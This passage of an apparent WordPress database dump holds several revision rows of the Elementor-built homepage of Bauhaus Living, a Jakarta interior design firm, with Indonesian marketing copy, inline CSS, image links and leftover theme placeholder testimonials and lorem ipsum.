.elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Berikut alasan banyak yang memilih Bauhaus\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:01:30','2023-09-22 10:01:30','',22,'https://bauhaus.futuremediatrix.com/?p=4918',0,'revision','',0),(4919,3,'2023-09-22 10:01:31','2023-09-22 10:01:31','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-22 10:01:31','2023-09-22 10:01:31','',22,'https://bauhaus.futuremediatrix.com/?p=4919',0,'revision','',0),(4920,3,'2023-09-22 10:02:44','2023-09-22 10:02:44','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat 